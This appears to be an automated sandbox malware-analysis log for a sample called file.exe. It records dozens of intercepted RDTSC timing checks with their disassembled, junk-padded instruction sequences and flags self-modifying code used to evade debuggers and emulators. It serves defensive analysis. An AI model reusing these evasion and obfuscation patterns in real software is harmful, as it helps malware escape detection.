Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE09FB second address: 4DE0A77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2834h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ret 0x0000000c nop 0x0000000d push eax 0x0000000e call 00007F927CFA3245h 0x00000013 mov edi, edi 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F9278BE282Eh 0x0000001c add ax, 5DF8h 0x00000021 jmp 00007F9278BE282Bh 0x00000026 popfd 0x00000027 pushfd 0x00000028 jmp 00007F9278BE2838h 0x0000002d adc al, 00000058h 0x00000030 jmp 00007F9278BE282Bh 0x00000035 popfd 0x00000036 popad 0x00000037 xchg eax, ebp 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F9278BE2830h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0A77 second address: 4DE0A7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0A7D second address: 4DE0AD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, esi 0x00000005 push eax 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F9278BE282Bh 0x00000012 sub si, 347Eh 0x00000017 jmp 00007F9278BE2839h 0x0000001c popfd 0x0000001d popad 0x0000001e xchg eax, ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F9278BE2838h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0AD0 second address: 4DE0AF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D80Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F927881D815h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0AF8 second address: 4DE0AFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0AFE second address: 4DE0B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D9003C second address: 4D90060 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2831h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9278BE282Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D90060 second address: 4D90066 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D90066 second address: 4D9006A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D9006A second address: 4D90089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F927881D814h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D90089 second address: 4D90150 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE282Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F9278BE2836h 0x00000010 and esp, FFFFFFF8h 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F9278BE282Eh 0x0000001a add ecx, 4977F118h 0x00000020 jmp 00007F9278BE282Bh 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007F9278BE2838h 0x0000002c adc cl, 00000078h 0x0000002f jmp 00007F9278BE282Bh 0x00000034 popfd 0x00000035 popad 0x00000036 xchg eax, ecx 0x00000037 jmp 00007F9278BE2836h 0x0000003c push eax 0x0000003d jmp 00007F9278BE282Bh 0x00000042 xchg eax, ecx 0x00000043 jmp 00007F9278BE2836h 0x00000048 xchg eax, ebx 0x00000049 jmp 00007F9278BE2830h 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D90150 second address: 4D90154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D90154 second address: 4D9015A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D9015A second address: 4D90160 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D90160 second address: 4D9017E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2831h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D9017E second address: 4D90182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D90182 second address: 4D90195 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE282Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D90195 second address: 4D901C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D819h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F927881D80Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D901C4 second address: 4D901CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D901CA second address: 4D901CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D901CE second address: 4D90207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007F9278BE2834h 0x0000000e mov dword ptr [esp], esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F9278BE2837h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D90207 second address: 4D9021F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F927881D814h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D9021F second address: 4D90223 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D90223 second address: 4D9023A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F927881D80Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D9023A second address: 4D90240 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D90240 second address: 4D90244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D90244 second address: 4D90248 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D90248 second address: 4D90275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F927881D80Eh 0x00000012 adc cx, 5808h 0x00000017 jmp 00007F927881D80Bh 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D90275 second address: 4D902A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2839h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9278BE282Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D902A4 second address: 4D902B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F927881D80Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D902B4 second address: 4D902DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE282Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9278BE2835h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D902DE second address: 4D902E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D902E3 second address: 4D90307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, bx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F92EB5E0B4Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9278BE2832h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D90307 second address: 4D9038B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 pushfd 0x00000007 jmp 00007F927881D80Dh 0x0000000c sub si, 4DF6h 0x00000011 jmp 00007F927881D811h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a cmp dword ptr [esi+08h], DDEEDDEEh 0x00000021 jmp 00007F927881D80Eh 0x00000026 je 00007F92EB21BAE7h 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F927881D80Dh 0x00000035 sub ecx, 7DDFEA06h 0x0000003b jmp 00007F927881D811h 0x00000040 popfd 0x00000041 call 00007F927881D810h 0x00000046 pop eax 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D9038B second address: 4D903C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2830h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c jmp 00007F9278BE2830h 0x00000011 or edx, dword ptr [ebp+0Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F9278BE282Ah 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D903C3 second address: 4D903C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D903C7 second address: 4D903CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D903CD second address: 4D903D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D903D3 second address: 4D903D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D903D7 second address: 4D903ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edx, 61000000h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 mov ecx, 553A4267h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D903ED second address: 4D90487 instructions: 0x00000000 rdtsc 0x00000002 mov ax, 9E03h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F9278BE2836h 0x0000000f and ch, FFFFFFC8h 0x00000012 jmp 00007F9278BE282Bh 0x00000017 popfd 0x00000018 pushfd 0x00000019 jmp 00007F9278BE2838h 0x0000001e sbb eax, 1238A228h 0x00000024 jmp 00007F9278BE282Bh 0x00000029 popfd 0x0000002a popad 0x0000002b popad 0x0000002c jne 00007F92EB5E0A65h 0x00000032 jmp 00007F9278BE2836h 0x00000037 test byte ptr [esi+48h], 00000001h 0x0000003b pushad 0x0000003c jmp 00007F9278BE282Eh 0x00000041 mov dl, cl 0x00000043 popad 0x00000044 jne 00007F92EB5E0A4Ch 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D90487 second address: 4D9048B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D9048B second address: 4D904A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2832h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D80756 second address: 4D8075A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D8075A second address: 4D80760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D808A1 second address: 4D8090E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D80Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov eax, 0ECFF13Bh 0x00000010 pushfd 0x00000011 jmp 00007F927881D810h 0x00000016 jmp 00007F927881D815h 0x0000001b popfd 0x0000001c popad 0x0000001d xchg eax, esi 0x0000001e pushad 0x0000001f jmp 00007F927881D80Ch 0x00000024 pushad 0x00000025 mov ah, 90h 0x00000027 mov di, 1600h 0x0000002b popad 0x0000002c popad 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F927881D815h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D8090E second address: 4D809DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a mov si, D651h 0x0000000e call 00007F9278BE282Eh 0x00000013 jmp 00007F9278BE2832h 0x00000018 pop ecx 0x00000019 popad 0x0000001a mov esi, dword ptr [ebp+08h] 0x0000001d pushad 0x0000001e mov ch, bh 0x00000020 pushfd 0x00000021 jmp 00007F9278BE2838h 0x00000026 jmp 00007F9278BE2835h 0x0000002b popfd 0x0000002c popad 0x0000002d sub ebx, ebx 0x0000002f pushad 0x00000030 mov edi, 7A8D2F80h 0x00000035 pushfd 0x00000036 jmp 00007F9278BE2839h 0x0000003b or eax, 738EAD86h 0x00000041 jmp 00007F9278BE2831h 0x00000046 popfd 0x00000047 popad 0x00000048 test esi, esi 0x0000004a jmp 00007F9278BE282Eh 0x0000004f je 00007F92EB5E81F5h 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007F9278BE2837h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D809DE second address: 4D80A6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F927881D80Fh 0x00000009 adc ecx, 1D73221Eh 0x0000000f jmp 00007F927881D819h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F927881D80Fh 0x00000026 add si, 4C2Eh 0x0000002b jmp 00007F927881D819h 0x00000030 popfd 0x00000031 popad 0x00000032 mov ecx, esi 0x00000034 jmp 00007F927881D80Eh 0x00000039 je 00007F92EB22314Dh 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 pushad 0x00000043 popad 0x00000044 mov si, dx 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D80A6B second address: 4D80AA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, si 0x00000006 mov cl, 56h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test byte ptr [77816968h], 00000002h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F9278BE2832h 0x0000001b and ch, 00000038h 0x0000001e jmp 00007F9278BE282Bh 0x00000023 popfd 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D80AA5 second address: 4D80ABB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F927881D812h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D80ABB second address: 4D80AD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE282Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F92EB5E8110h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D80AD8 second address: 4D80ADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D80ADC second address: 4D80AF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2837h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D80AF7 second address: 4D80AFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D80AFD second address: 4D80B01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D80B01 second address: 4D80B77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+0Ch] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F927881D80Dh 0x00000012 adc si, A096h 0x00000017 jmp 00007F927881D811h 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F927881D810h 0x00000023 jmp 00007F927881D815h 0x00000028 popfd 0x00000029 popad 0x0000002a xchg eax, ebx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F927881D818h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D80B77 second address: 4D80B7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D80B7B second address: 4D80B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D80C9E second address: 4D80CB1 instructions: 0x00000000 rdtsc 0x00000002 movsx edi, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov cx, B11Dh 0x0000000b popad 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D80CB1 second address: 4D80CB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D80CB5 second address: 4D80CB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D80CB9 second address: 4D80CBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D90A20 second address: 4D90A81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2834h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F9278BE2837h 0x00000012 xor al, 0000006Eh 0x00000015 jmp 00007F9278BE2839h 0x0000001a popfd 0x0000001b movzx esi, dx 0x0000001e popad 0x0000001f mov ebx, 2BC53CD0h 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 mov ax, di 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D90A81 second address: 4D90B11 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F927881D817h 0x00000008 and ah, 0000002Eh 0x0000000b jmp 00007F927881D819h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F927881D818h 0x0000001d and esi, 504D0DD8h 0x00000023 jmp 00007F927881D80Bh 0x00000028 popfd 0x00000029 push esi 0x0000002a mov eax, ebx 0x0000002c pop edx 0x0000002d popad 0x0000002e pop ebp 0x0000002f pushad 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007F927881D80Ah 0x00000037 xor al, 00000038h 0x0000003a jmp 00007F927881D80Bh 0x0000003f popfd 0x00000040 popad 0x00000041 push eax 0x00000042 push edx 0x00000043 mov si, bx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D90B11 second address: 4D90B15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D90F72 second address: 4D90F78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D90F78 second address: 4D90F7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D90F7C second address: 4D90F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F927881D816h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D90F9D second address: 4D90FA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D90FA3 second address: 4D90FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E1032D second address: 4E10332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E10332 second address: 4E10376 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D80Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c jmp 00007F927881D80Eh 0x00000011 push dword ptr [ebp+08h] 0x00000014 jmp 00007F927881D810h 0x00000019 call 00007F927881D809h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E10376 second address: 4E10393 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2839h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E10393 second address: 4E10399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E10399 second address: 4E1039D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E1039D second address: 4E10421 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D813h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 pop esi 0x00000012 popad 0x00000013 jmp 00007F927881D817h 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d jmp 00007F927881D819h 0x00000022 mov eax, dword ptr [eax] 0x00000024 pushad 0x00000025 push edi 0x00000026 jmp 00007F927881D80Ah 0x0000002b pop ecx 0x0000002c mov edx, 1B5A16C6h 0x00000031 popad 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F927881D813h 0x0000003d rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: A6EC40 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: A6C482 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: C35543 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: C12E29 instructions caused by: Self-modifying code
